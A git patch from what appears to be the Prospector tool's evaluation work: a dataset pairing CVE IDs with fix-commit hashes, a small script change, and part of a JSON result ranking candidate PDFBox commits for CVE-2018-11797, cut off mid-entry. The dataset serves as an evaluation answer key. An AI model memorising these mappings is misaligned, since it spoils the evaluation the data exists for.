+CVE-2019-11938;https://github.com/facebook/fbthrift;None:None;False;08c2d412adb214c40bb03be7587057b25d053030,71c97ffdcb61cccf1f8267774e873e21ebd3ebd3; +CVE-2015-2944;https://github.com/apache/sling-old-svn-mirror;None:None;False;db1ccbd029e9620c12534deb6d0314738f323c66,d2ba859e23e219446cdaba4a908c730e28c44959,add3a9a751f65308d7b1cf18c4d56b9e5dde5e4c; +CVE-2020-9402;https://github.com/django/django;None:None;False;26a5cf834526e291db00385dd33d319b8271fc4,fe886a3b58a93cfbe8864b485f93cb6d426cd1f,02d97f3c9a88adc890047996e5606180bd1c616; +CVE-2020-15142;https://github.com/triaxtec/openapi-python-client;None:None;False;f7a56aae32cba823a77a84a1f10400799b19c19a; +CVE-2018-1000067;https://github.com/jenkinsci/jenkins;None:None;False;2d16b459205730d85e51499c2457109b234ca9d9; +CVE-2017-4995-JK;https://github.com/FasterXML/jackson-databind;None:None;False;6ce32ffd18facac6abdbbf559c817b47fcb622c; +CVE-2020-26259;https://github.com/x-stream/xstream;None:None;False;0bcbf50126a62dfcd65f93a0da0c6d1ae92aa738; +CVE-2019-1003035;https://github.com/jenkinsci/azure-vm-agents-plugin;None:None;False;91bfc7d95ae1349ce2a8b6b7e73155848fdc1d82; +CVE-2019-14235;https://github.com/django/django;None:None;False;cf694e6852b0da7799f8b53f1fb2f7d20cf1753; +CVE-2020-24583;https://github.com/django/django;None:None;False;934430d22aa5d90c2ba33495ff69a6a1d997d58,08892bffd275c79ee1f8f67639eb170aaaf1181,375657a71c889c588f723469bd868bd1d40c369; +CVE-2018-1062;https://gerrit.ovirt.org/ovirt-engine.git;None:None;False;820888c4e8dfbe79dc55e1ba8e72edb0ebd8890; +CVE-2019-12387;https://github.com/twisted/twisted;None:None;False;6c61fc4503ae39ab8ecee52d10f10ee2c371d7e2; +CVE-2020-9487;https://github.com/apache/nifi;None:None;False;01e42dfb3291c3a3549023edadafd2d8023f3042; +CVE-2019-9735;https://github.com/openstack/neutron;None:None;False;558a977902c9e83aabaefe67333aee544aa8658; +DJANGO-REST-002;https://github.com/encode/django-rest-framework;None:None;False;4bb9a3c48427867ef1e46f7dee945a4c25a4f9b8; +CVE-2020-26882;https://github.com/playframework/playframework;None:None;False;585590673fa55f0d8218b18a00be7ca9370538d,c8bff5635254ffa1a37db640effc5ef55002d2e,d9370f49735c7d04e67879cbdd29f74c9a2c442; +CVE-2019-10332;https://github.com/jenkinsci/electricflow-plugin;None:None;False;0a934493290773a953fa7b29c19b555971b1144b; +CVE-2011-2730;https://github.com/spring-projects/spring-framework.git;None:None;False;9772eb8410e37cd0bdec0d1b133218446c778beb; +REQUESTS-5099;https://github.com/psf/requests;None:None;False;d88240ba449f1c92006102adc475543d5e649ffa; +CVE-2018-11786;https://github.com/apache/karaf;None:None;False;24fb477ea886e8f294dedbad98d2a2c4cb2a44f9; +CVE-2016-2513;https://github.com/django/django;None:None;False;af7d09b0c5c6ab68e629fd9baf736f9dd203b18; +CVE-2019-7548;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; +CVE-2018-11764;https://github.com/apache/hadoop;None:None;False;493924def8f184e74d57153afc9c22b0eeb95e9c; +CVE-2019-10361;https://github.com/jenkinsci/m2release-plugin;None:None;False;a2e7f2bb82640a9d3641265a19c86ba141a7e79c; +CVE-2020-15252;https://github.com/xwiki/xwiki-platform;None:None;False;1bf4eadddf3ca35ba536f7add139d5027e1d427,766e5e8480fc893ced8fc8f34e81f97d4a69449; +CVE-2018-9856;https://github.com/Kotti/Kotti;None:None;False;00b56681fa9fb8587869a5e00dcd56503081d3b9; +CVE-2017-0906;https://github.com/recurly/recurly-client-python;None:None;False;049c74699ce93cf126feff06d632ea63fba36742; +CVE-2017-12615;https://github.com/apache/tomcat;None:None;False;e862b0c259b4c867553df29cef1af9e904af83b0,07dc0ea2745f0afab6415f22b16a29f1c6de5727; +CVE-2019-16556;https://github.com/jenkinsci/rundeck-plugin;None:None;False;157f8fc845c05f7ad6417875b1fa15bb0e47543b; +CVE-2016-8739;https://github.com/apache/cxf;None:None;False;8e4970d931ae72f92c54d170a844b37137b8fda6; +CVE-2014-2059;https://github.com/jenkinsci/jenkins.git;None:None;False;ad38d8480f20ce3cbf8fec3e2003bc83efda4f7d; +NEO-PYTHON-001;https://github.com/CityOfZion/neo-python;None:None;False;8e9c488bc0506f13424dc4208b64f250dff2818d; +CVE-2015-0899;https://github.com/kawasima/struts1-forever;None:None;False;212bb0f7c57617b7b9c44cb1e056bd1e597c8e16; +CVE-2019-1003015;https://github.com/jenkinsci/job-import-plugin;None:None;False;1d81e59330d371d15d3672dabc17d35dcd9fb824; +AMQ-5751;https://github.com/apache/activemq;None:None;False;886e2d4d97555e2f10276616389a5d1f915bad18; +CVE-2020-15120;https://github.com/spiral-project/ihatemoney;None:None;False;7fd18288888b7cc913382da2f3d1020815d74cdf,8d77cf5d5646e1d2d8ded13f0660638f57e98471; +CVE-2020-12668;https://github.com/HubSpot/jinjava;None:None;False;1b9aaa4b420c58b4a301cf4b7d26207f1c8d1165,5dfa5b87318744a4d020b66d5f7747acc36b213b; +CVE-2018-1000104;https://github.com/jenkinsci/coverity-plugin;None:None;False;34b7c2b07014b8e1e708361170146600db172491; +CVE-2019-5918;https://github.com/nablarch/nablarch-core-dataformat;None:None;False;3afbc9735a310c14a00841e58210bd3c15de4e88; +CVE-2019-10334;https://github.com/jenkinsci/electricflow-plugin;None:None;False;d0b807d5e2de07a90d902401bae033c2907b850a; +CVE-2016-5394;https://github.com/apache/sling;None:None;False;7d2365a248943071a44d8495655186e4f14ea294; +CVE-2019-19687;https://github.com/openstack/keystone;None:None;False;17c337dbdbfb9d548ad531c2ad0483c9bce5b98f; +CVE-2017-7234;https://github.com/django/django;None:None;False;001ff508081a893d0cf81df1214dbd234606c36; +CVE-2018-16859;https://github.com/ansible/ansible;None:None;False;8c1f701e6e9df29fe991f98265e2dd76acca4b8c; +CVE-2017-15720;https://github.com/apache/airflow;None:None;False;daa281c0364609d6812921123cf47e4118b40484; +CVE-2020-15163;https://github.com/theupdateframework/tuf;None:None;False;3d342e648fbacdf43a13d7ba8886aaaf07334af7; +CVE-2019-1003009;https://github.com/jenkinsci/active-directory-plugin;None:None;False;520faf5bb1078d75e5fed10b7bf5ac6241fe2fc4; +CVE-2019-18835;https://github.com/matrix-org/synapse;None:None;False;172f264ed38e8bef857552f93114b4ee113a880b; +CVE-2018-1999036;https://github.com/jenkinsci/ssh-agent-plugin;None:None;False;3a8abe1889d25f9a73cdba202cf27212b273de4d; +CVE-2015-5159;https://github.com/latchset/kdcproxy;None:None;False;f274aa6787cb8b3ec1cc12c440a56665b7231882; +AMQP-590;https://github.com/spring-projects/spring-amqp;None:None;False;462dcb6f1f93d54923daffb9729c1c8519576c08; +CVE-2019-1003026;https://github.com/jenkinsci/mattermost-plugin;None:None;False;51ebae2c57977193b45cd60fc70595a0e6df4cb2; +CVE-2019-10460;https://github.com/jenkinsci/bitbucket-oauth-plugin;None:None;False;f55d222db910220ca8cd8631fb746c98b9e12870; +CVE-2020-17518;https://github.com/apache/flink;None:None;False;a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4; +CVE-2020-26250;https://github.com/jupyterhub/oauthenticator;None:None;False;a4aac191c16cf6281f3d346615aefa75702b02d7; +CVE-2018-1999045;https://github.com/jenkinsci/jenkins;None:None;False;ef9583a24abc4de157e1570cb32d7a273d327f36; +ANSIBLE-RUNNER-237;https://github.com/ansible/ansible-runner;None:None;False;4af02527634046b80245face235d3d6e2f0e9f3a; +CVE-2019-16558;https://github.com/jenkinsci/inflectra-spira-integration-plugin;None:None;False;418c8e8f36d847837d00eaab59c9c04d92d41548; +JENKINS-ACUNETIX-980;https://github.com/jenkinsci/acunetix-plugin;None:None;False;b702b1906d3ae8a06ef6b394efe0d85d805fa738; +CVE-2018-1999042;https://github.com/jenkinsci/jenkins;None:None;False;727d58f690abf64f543407e1de3545eca76ad30e; +CVE-2019-10476;https://github.com/jenkinsci/zulip-plugin;None:None;False;2a9dd6c41c2d913b0414d015b3118e3ddb60bd90; +CVE-2020-36242;https://github.com/pyca/cryptography;None:None;False;06cbf77371881e80ea4b5e349136dcc53749fc0c; +LXML-461;https://github.com/lxml/lxml;None:None;False;89e7aad6e7ff9ecd88678ff25f885988b184b26e; +CVE-2020-12691;https://github.com/openstack/keystone;None:None;False;d009384c9b683008d572f9996e1fe4e5e5d82096; +CVE-2019-12417;https://github.com/apache/airflow;None:None;False;caf1f264b845153b9a61b00b1a57acb7c320e743; +CVE-2013-6372;https://github.com/jenkinsci/subversion-plugin.git;None:None;False;7d4562d6f7e40de04bbe29577b51c79f07d05ba6; +CVE-2009-0039;https://github.com/apache/geronimo;None:None;False;aa0c2c26dde8930cad924796af7c17a13d236b16,f8a612df7b06729bfd6c826e1a110d4bb40dc1f5,67dda0760bb0925ead201ddd5d809ff53686d63f; +CVE-2020-26234;https://github.com/opencast/opencast;None:None;False;4225bf90af74557deaf8fb6b80b0705c9621acfc; +CVE-2017-11427;https://github.com/onelogin/python-saml;None:None;False;fad881b4432febea69d70691dfed51c93f0de10f; +CVE-2017-1000481;https://github.com/plone/Products.CMFPlone;None:None;False;236b62b756ff46a92783b3897e717dfb15eb07d8; +CVE-2019-10358;https://github.com/jenkinsci/maven-plugin;None:None;False;23e3fe5c43705883e4fb9d3ba052dfb1af3f2464; +CVE-2020-6174;https://github.com/theupdateframework/tuf;None:None;False;a0397c7c820ec1c30ebc793cc9469b61c8d3f50e; +CVE-2020-15225;https://github.com/carltongibson/django-filter;None:None;False;82c9a420d2ab9addcb20d6702e74afa5c04cd91f; +CVE-2019-1003003;https://github.com/jenkinsci/jenkins;None:None;False;07c09bebb8396a48063c1da4fc4b628acddd72a8; +CVE-2020-26137;https://github.com/urllib3/urllib3;None:None;False;1dd69c5c5982fae7c87a620d487c2ebf7a6b436b; +CVE-2020-14365;https://github.com/ansible/ansible;None:None;False;1d043e082b3b1f3ad35c803137f5d3bcbae92275; +CVE-2011-2765;https://github.com/irmen/Pyro3;None:None;False;554e095a62c4412c91f981e72fd34a936ac2bf1e; +CVE-2018-1000110;https://github.com/jenkinsci/git-plugin;None:None;False;a3d3a7eb7f75bfe97a0291e3b6d074aafafa86c9; +CVE-2018-6188;https://github.com/django/django;None:None;False;af33fb250e9847f1ca8c0ba0d72671d76659704f; +CVE-2019-10307;https://github.com/jenkinsci/analysis-core-plugin;None:None;False;3d7a0c7907d831c58541508b893dcea2039809c5; +CVE-2019-10416;https://github.com/jenkinsci/violation-comments-to-gitlab-plugin;None:None;False;76ee602dc5297064cdce798dcabaa1560a5adfc6,e8237a803012bae7773d8bd10fe02e21892be3fe; +CVE-2018-6356;https://github.com/jenkinsci/jenkins;None:None;False;9de62915807deab61d6e780eed660428f9889b51,eb03a42078f29dbed3742b8740c95e02890e4545; +CVE-2015-0886;https://github.com/djmdjm/jBCrypt;None:None;False;0c28b698e79b132391be8333107040d774c79995; +CVE-2019-6446;https://github.com/numpy/numpy;None:None;False;a2bd3a7eabfe053d6d16a2130fdcad9e5211f6b,8cea82a54a36b2232b484c7a50a32cefcb85e6b; +CVE-2020-28052;https://github.com/bcgit/bc-java;None:None;False;97578f9b7ed277e6ecb58834e85e3d18385a4219; +HDFS-10276;https://github.com/apache/hadoop;None:None;False;5ea6fd85c7aff6df28b87789f607bb57ee92063; +CVE-2020-10289;https://github.com/ros/actionlib;None:None;False;b003365642227049abd01281c296977d8749f85f; +CVE-2012-6119;https://github.com/candlepin/candlepin.git;None:None;False;f4d93230e58b969c506b4c9778e04482a059b08c; +CVE-2018-8036;https://github.com/apache/pdfbox;None:None;False;038c09b5f361e083a00ce076c95521b73202fcb4; +CVE-2017-1000487;https://github.com/codehaus-plexus/plexus-utils;None:None;False;b38a1b3a4352303e4312b2bb601a0d7ec6e28f41; +CVE-2018-1000109;https://github.com/jenkinsci/google-play-android-publisher-plugin;None:None;False;f81b058289caf3332ae40d599a36a3665b1fa13c; +CVE-2007-5712;https://github.com/django/django;None:None;False;412ed22502e11c50dbfee854627594f0e7e2c23; +CVE-2018-1000866;https://github.com/jenkinsci/groovy-sandbox;None:None;False;0cd7ec12b7c56cfa3167d99c5f43147ce05449d3; +CVE-2021-21607;https://github.com/jenkinsci/jenkins;None:None;False;a890d68699ad6ca0c8fbc297a1d4b7ebf23f384b; +CVE-2016-9910;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; +CVE-2017-14696;https://github.com/saltstack/salt;None:None;False;5f8b5e1a0f23fe0f2be5b3c3e04199b57a53db5b; +CVE-2020-24715;https://github.com/scalyr/scalyr-agent-2;None:None;False;56d26e09733acc047e88d873e1fd8478dd10961c; +CVE-2015-7940;http://git.bouncycastle.org/repositories/bc-java;None:None;False;5cb2f0578e6ec8f0d67e59d05d8c4704d8e05f83,e25e94a046a6934819133886439984e2fecb2b04; +CVE-2020-26939;https://github.com/bcgit/bc-java;None:None;False;930f8b274c4f1f3a46e68b5441f1e7fadb57e8c1; +CVE-2018-1000808;https://github.com/pyca/pyopenssl;None:None;False;e73818600065821d588af475b024f4eb518c3509; +CVE-2018-16166;https://github.com/JPCERTCC/LogonTracer;None:None;False;2bb79861dbaf7e8a9646fcd70359523fdb464d9c; +SPR-7779;https://github.com/spring-projects/spring-framework;None:None;False;f4a2282d9d9f6e58029022c58311a1db07f7defc; +CVE-2014-0050;https://github.com/apache/commons-fileupload;None:None;False;c61ff05b3241cb14d989b67209e57aa71540417a; +APACHE-SLING-5946;https://github.com/apache/sling-org-apache-sling-xss;None:None;False;bf2fb9bfb7aad00ece84456b3bd0a015d61788b9; +CVE-2019-17134;https://github.com/openstack/octavia;None:None;False;b0c2cd7b4c835c391cfedf12cf9f9ff8a0aabd17; +CVE-2019-1003047;https://github.com/jenkinsci/fortify-on-demand-uploader-plugin;None:None;False;e555f8d62ef793ce221f471d7172cad847fb9252; +CVE-2021-21330;https://github.com/aio-libs/aiohttp;None:None;False;2545222a3853e31ace15d87ae0e2effb7da0c96b; +CVE-2017-1000393;https://github.com/jenkinsci/jenkins;None:None;False;d7ea3f40efedd50541a57b943d5f7bbed046d091; +PYCRYPTODOME-90;https://github.com/Legrandin/pycryptodome;None:None;False;99c27a3b9e8a884bbde0e88c63234b669d4398d8; +CVE-2019-7313;https://github.com/buildbot/buildbot;None:None;False;f0ccd5fd572ea8223b48bd57d8c2548b2f7d3ecf; +HADOOP-13105;https://github.com/apache/hadoop;None:None;False;5e6ee5aafb9b9f200d906444e4731cfc60ac6eb; +CVE-2020-11010;https://github.com/tortoise/tortoise-orm;None:None;False;75e41ca12b2a991c4508e765828d5e7b1c37cba,91c364053e0ddf77edc5442914c6f049512678b; +CVE-2019-0228;https://github.com/apache/pdfbox;None:None;False;072d68ec99a71bf271ec0f879e5cd71511e89093; +CVE-2019-10342;https://github.com/jenkinsci/docker-plugin;None:None;False;6ad27199f6fad230be72fd45da78ddac85c075db; +CVE-2019-10856;https://github.com/jupyter/notebook;None:None;False;979e0bd15e794ceb00cc63737fcd5fd9addc4a99; +CVE-2020-13955;https://github.com/apache/calcite;None:None;False;43eeafcbac29d02c72bd520c003cdfc571de2d15; +S2-043;https://github.com/apache/struts;None:None;False;ba0563183b128dcef88b469f46e528a12e0179e7; +CVE-2019-10255;https://github.com/jupyter/notebook;None:None;False;08c4c898182edbe97aadef1815cce50448f975cb,70fe9f0ddb3023162ece21fbb77d5564306b913b; +CVE-2019-10311;https://github.com/jenkinsci/ansible-tower-plugin;None:None;False;b63a047281c2389217c9404f2f4bd4c9e66364fe; +CVE-2019-1003029;https://github.com/jenkinsci/script-security-plugin;None:None;False;f2649a7c0757aad0f6b4642c7ef0dd44c8fea434; +CVE-2019-10415;https://github.com/jenkinsci/violation-comments-to-gitlab-plugin;None:None;False;76ee602dc5297064cdce798dcabaa1560a5adfc6,e8237a803012bae7773d8bd10fe02e21892be3fe; +CVE-2015-1326;https://github.com/martinpitt/python-dbusmock;None:None;False;4e7d0df909338eb3c44b083722c7bf8b76bdf940; +CVE-2019-12308;https://github.com/django/django;None:None;False;09186a13d975de6d049f8b3e05484f66b01ece6; +CVE-2019-1003013;https://github.com/jenkinsci/blueocean-plugin;None:None;False;62775e78532b756826bb237775b64a5052624b57; +CVE-2012-6153;https://github.com/apache/httpcomponents-client;None:None;False;6e14fc146a66e0f3eb362f45f95d1a58ee18886a; +CVE-2020-10108;https://github.com/twisted/twisted;None:None;False;4a7d22e490bb8ff836892cc99a1f54b85ccb0281; +CVE-2019-10430;https://github.com/jenkinsci/neuvector-vulnerability-scanner-plugin;None:None;False;65b7ae14a21dd566a671631694121cee458ce3cf; +CVE-2018-1000149;https://github.com/jenkinsci/ansible-plugin;None:None;False;06d30e5b626a978e258a7f4ab473cd7f53a7cba7; +CVE-2020-9486;https://github.com/apache/nifi;None:None;False;148537d64a017b73160b0d49943183c18f883ab0; +CVE-2014-2061;https://github.com/jenkinsci/jenkins.git;None:None;False;bf539198564a1108b7b71a973bf7de963a6213ef; +CVE-2014-2066;https://github.com/jenkinsci/jenkins.git;None:None;False;8ac74c350779921598f9d5edfed39dd35de8842a; +CVE-2016-2512;https://github.com/django/django;None:None;False;382ab137312961ad62feb8109d70a5a581fe835; +PYRO4-001;https://github.com/irmen/Pyro4;None:None;False;a9544e05ff175201187ff1530364dd4d77ee0d3d; +CVE-2020-1747;https://github.com/yaml/pyyaml;None:None;False;5080ba513377b6355a0502104846ee804656f1e0; +CVE-2017-12852;https://github.com/numpy/numpy;None:None;False;01718a9feb7f949b091e4f95320c1a60116e77a5,11593aa176d491beb0cc5ffcc393956a5435a2bf; +QUARKUS-10050;https://github.com/quarkusio/quarkus;None:None;False;8141f98b4d690afb7ff6cf5dc3bf980fdb3d9e34; +CVE-2020-11974;https://github.com/apache/incubator-dolphinscheduler;None:None;False;86f4276f0fd8d3d42ce9bcc13463eb015232b56f; +CVE-2017-8342;https://github.com/Kozea/Radicale;None:None;False;059ba8dec1f22ccbeab837e288b3833a099cee2; +CVE-2019-11324;https://github.com/urllib3/urllib3;None:None;False;1efadf43dc63317cd9eaa3e0fdb9e05ab07254b1; +CVE-2011-1498;https://github.com/apache/httpcomponents-client;None:None;False;a572756592c969affd0ce87885724e74839176fb; +CVE-2020-13757;https://github.com/sybrenstuvel/python-rsa;None:None;False;93af6f2f89a9bf28361e67716c4240e691520f30; +CVE-2020-13254;https://github.com/django/django;None:None;False;07e59caa02831c4569bbebb9eb773bdd9cb4b20,84b2da5552e100ae3294f564f6c862fef8d0e69; +CVE-2019-1003006;https://github.com/jenkinsci/groovy-plugin;None:None;False;212e048a319ae32dad4cfec5e73a885a9f4781f0; +CVE-2018-17175;https://github.com/marshmallow-code/marshmallow;None:None;False;d5d9cb22dda6f39117f6f9497a6a66813cb8c64f; +CVE-2019-1003046;https://github.com/jenkinsci/fortify-on-demand-uploader-plugin;None:None;False;e555f8d62ef793ce221f471d7172cad847fb9252; +CVE-2021-25646;https://github.com/apache/druid;None:None;False;ae4b1920c53d34008ab55cfa2e368a8affad77a,3f8f00a231c4b47981e0e2e48f18f1221249e6f; +CVE-2019-16553;https://github.com/jenkinsci/build-failure-analyzer-plugin;None:None;False;f316c885552ac75289cbb11b2af5757f18784bcb; +CVE-2016-6798;https://github.com/apache/sling;None:None;False;fb2719e8299fadddae62245482de112052a0e08c; +CVE-2017-1000388;https://github.com/jenkinsci/depgraph-view-plugin;None:None;False;d442ff671965c279770b28e37dc63a6ab73c0f0e; +CVE-2021-21479;https://github.com/SAP/scimono;None:None;False;413b5d75fa94e77876af0e47be76475a23745b80; +CVE-2020-14366;https://github.com/keycloak/keycloak;None:None;False;1281f28bb8d9968cce443324b81319fa25d70d65; +IMAGEIO-483;https://github.com/imageio/imageio;None:None;False;5b398716d518cd14e8b978ea3cd8ec6c0236c1d8; +CVE-2019-10436;https://github.com/jenkinsci/google-oauth-plugin;None:None;False;aef26a8425e515a9986412000d6191db95fa9e56; +HADOOP-15212;https://github.com/apache/hadoop;None:None;False;2dd960de983a30bf0d9ee957bdb09f825f9d40a; +CVE-2019-10326;https://github.com/jenkinsci/warnings-ng-plugin;None:None;False;38e5354161733ef9e458b44ad08676d79640fa36; +CVE-2018-12585;https://github.com/OPCFoundation/UA-Java;None:None;False;83fe7a9f9a510f35e3903bef907d22889f99b08b; +CVE-2021-21241;https://github.com/Flask-Middleware/flask-security;None:None;False;61d313150b5f620d0b800896c4f2199005e84b1f; +INDICO-2019-10-2;https://github.com/indico/indico;None:None;False;0796f373b68bc2722048caed7f3a892d8e1851e,556343cfe735ec2cfa2085d789d548656c496bb; +CVE-2019-14856;https://github.com/ansible/ansible;None:None;False;7f4befdea77045fa83b5f2b304bd5e16b219f74c; +CVE-2016-1000001;https://github.com/puiterwijk/flask-oidc;None:None;False;f2ef8b4ffa445be00f6602e446e60916f4ee4d30; +CVE-2020-15141;https://github.com/triaxtec/openapi-python-client;None:None;False;3e7dfae5d0b3685abf1ede1bc6c086a116ac4746; +CVE-2019-10906;https://github.com/pallets/jinja;None:None;False;a2a6c930bcca591a25d2b316fcfd2d6793897b26; +CVE-2013-4378;https://github.com/javamelody/javamelody;None:None;False;aacbc46151ff4ac1ca34ce0899c2a6113071c66e; +CVE-2020-27217;https://github.com/eclipse/hono;None:None;False;af439d58fa12ebf95cfbdd26b4505b57d7debf11; +CVE-2020-12676;https://github.com/FusionAuth/fusionauth-samlv2;None:None;False;886dbb55613e5c2b99a8b83232f846ba7e5cd5ea; +CVE-2013-1445;https://github.com/dlitz/pycrypto;None:None;False;19dcf7b15d61b7dc1a125a367151de40df6ef175; +CVE-2015-8557;https://github.com/sol/pygments;None:None;False;74e7ad477f7ff7a70b987fcfc5c558ec14264c13; +CVE-2017-1000433;https://github.com/rohe/pysaml2;None:None;False;6312a41e037954850867f29d329e5007df1424a5; +2012-05-05;https://github.com/google/gson;None:None;False;1103bda23acb1719364e834a4545739ec2f76cd0; +CVE-2012-2417;https://github.com/Legrandin/pycrypto;None:None;False;9f912f13df99ad3421eff360d6a62d7dbec755c2; +CVE-2018-8042;https://github.com/apache/ambari;None:None;False;5d1fa9d11f856a7460734244c22900dcbf314db; +CVE-2020-12889;https://github.com/MISP/MISP-maltego;None:None;False;3ccde66dab4096ab5663e69f352992cc73e1160b; +CVE-2015-0260;https://github.com/msabramo/kallithea;None:None;False;7ae870ffbceb932cb5fff1a7f48e88f4996db7c8; +CVE-2021-21290;https://github.com/netty/netty;None:None;False;c735357bf29d07856ad171c6611a2e1a0e0000ec; +FLASK-ADMIN-001;https://github.com/flask-admin/flask-admin;None:None;False;0dc5a48fd0a4fdd28172e0bc508373ddb58fc50b; +CVE-2017-1000502;https://github.com/jenkinsci/ec2-plugin;None:None;False;180f7d0eae6031d67259a5d86d9d7d382f9eb05b; diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index a4aa65cdc..d59f812d7 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -983,11 +983,12 @@ def execute_prospector_wrapper(kwargs): def execute_prospector(filename: str, cve: str = ""): - dataset = load_dataset("empirical_study/datasets/" + filename + ".csv") + # dataset = load_dataset("empirical_study/datasets/" + filename + ".csv") + dataset = load_dataset(filename) if len(cve) != 0: dataset = [c for c in dataset if c[0] in cve] - for cve in dataset: + for cve in dataset[:10]: if os.path.exists(f"empirical_study/datasets/{filename}/{cve[0]}.json"): continue print( @@ -998,7 +999,7 @@ def execute_prospector(filename: str, cve: str = ""): vulnerability_id=cve[0], repository_url=cve[1], version_interval=cve[2], - git_cache="/sapmnt/home/I586140/intern/gitcache", + # git_cache="/sapmnt/home/I586140/intern/gitcache", # git_cache="/users/sach/gitcache", limit_candidates=2000, ) From aa22101ee1b390cb7060ddfdc4d2822a55dad4b5 Mon Sep 17 00:00:00 2001 From: I748376 Date: Mon, 15 Jul 2024 07:50:54 +0000 Subject: [PATCH 026/130] results from run --- .../steady_dataset.csv/CVE-2018-11797.json | 34820 ++++++++++++++++ 1 file changed, 34820 insertions(+) create mode 100644 prospector/empirical_study/datasets/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv/CVE-2018-11797.json diff --git a/prospector/empirical_study/datasets/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv/CVE-2018-11797.json b/prospector/empirical_study/datasets/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv/CVE-2018-11797.json new file mode 100644 index 000000000..c0e38770f --- /dev/null +++ b/prospector/empirical_study/datasets/evaluation/data/steady_dataset/starting_datasets/steady_dataset.csv/CVE-2018-11797.json @@ -0,0 +1,34820 @@ +{ + "advisory_record": { + "cve_id": "CVE-2018-11797", + "description": "In Apache PDFBox 1.8.0 to 1.8.15 and 2.0.0RC1 to 2.0.11, a carefully crafted PDF file can trigger an extremely long running computation when parsing the page tree.", + "reserved_timestamp": 1528156800, + "published_timestamp": 1538697600, + "updated_timestamp": 1621346775, + "repository_url": null, + "references": { + "https://lists.apache.org/thread.html/645574bc50b886d39c20b4065d51ccb1cd5d3a6b4750a22edbb565eb%40%3Cannounce.apache.org%3E": 2, + "https://lists.apache.org/thread.html/a9760973a873522f4d4c0a99916ceb74f361d91006b663a0a418d34a%40%3Cannounce.apache.org%3E": 2, + "https://lists.debian.org/debian-lts-announce/2018/10/msg00008.html": 2, + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/POPOGHJ5CVMUVCRQU7APBAN5IVZGZFDX/": 2, + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6HKVPTJWZGUB4MH4AAOWMRJHRDBYFHGJ/": 2, + "https://www.oracle.com/security-alerts/cpuapr2020.html": 2, + "https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8%40%3Cdev.pdfbox.apache.org%3E": 2 + }, + "affected_products": [ + "PDFBox", + "Apache PDFBox", + "Apache" + ], + "versions": { + "status": "affected", + "version": "1.8.0 to 1.8.15" + }, + "files": [ + "PDF", + "PDFBox" + ], + "keywords": [ + "tree", + "apache", + "craft", + "file", + "parse", + "page", + "pdfbox", + "running", + "trigger", + "computation" + ], + "files_extension": [], + "has_fixing_commit": false + }, + "commits": [ + { + "commit_id": "48dbb7ff9c2ef62282f8363c8592239251b48244", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523989276, + "hunks": 5, + "message": "PDFBOX-2941: don't lose benchmark result when mouse moves into PDF pane and out git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829382 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", + "index 83702b12f..3a6ba445b 100644", + "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", + "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java", + "@@ -63,2 +63,3 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", + " private final PDPage page;", + "+ private String labelText = \"\";", + "@@ -236,3 +237,3 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", + " {", + "- statuslabel.setText(\"\");", + "+ statuslabel.setText(labelText);", + " }", + "@@ -259,3 +260,4 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", + " label.setIcon(null);", + "- label.setText(\"Rendering...\");", + "+ labelText = \"Rendering...\";", + "+ label.setText(labelText);", + " PDFRenderer renderer = new PDFRenderer(document);", + "@@ -263,6 +265,7 @@ public class PagePane implements ActionListener, AncestorListener, MouseMotionLi", + " long t0 = System.currentTimeMillis();", + "- statuslabel.setText(\"Rendering...\");", + "+ statuslabel.setText(labelText);", + " BufferedImage bim = renderer.renderImage(pageIndex, scale);", + " float t = (System.currentTimeMillis() - t0) / 1000f;", + "- statuslabel.setText(\"Rendered in \" + t + \" second\" + (t > 1 ? \"s\" : \"\"));", + "+ labelText = \"Rendered in \" + t + \" second\" + (t > 1 ? \"s\" : \"\");", + "+ statuslabel.setText(labelText);", + " return ImageUtil.getRotatedImage(bim, rotation);" + ], + "changed_files": [ + "debugger/src/main/java/org/apache/pdfbox/debugger/pagepane/PagePane.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-2941": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "RELEVANT_WORDS_IN_MESSAGE", + "message": "The commit message contains some relevant words: PDF", + "relevance": 8 + }, + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: page", + "relevance": 4 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-2941", + "relevance": 2 + } + ] + }, + { + "commit_id": "54c040c429912040f5a1911c0a8c593b0b9d4821", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524320249, + "hunks": 150, + "message": "PDFBOX-4189: Enable PDF creation with Bengali by reading and utilizing the GSUB table, by Palash Ray git-svn-id: 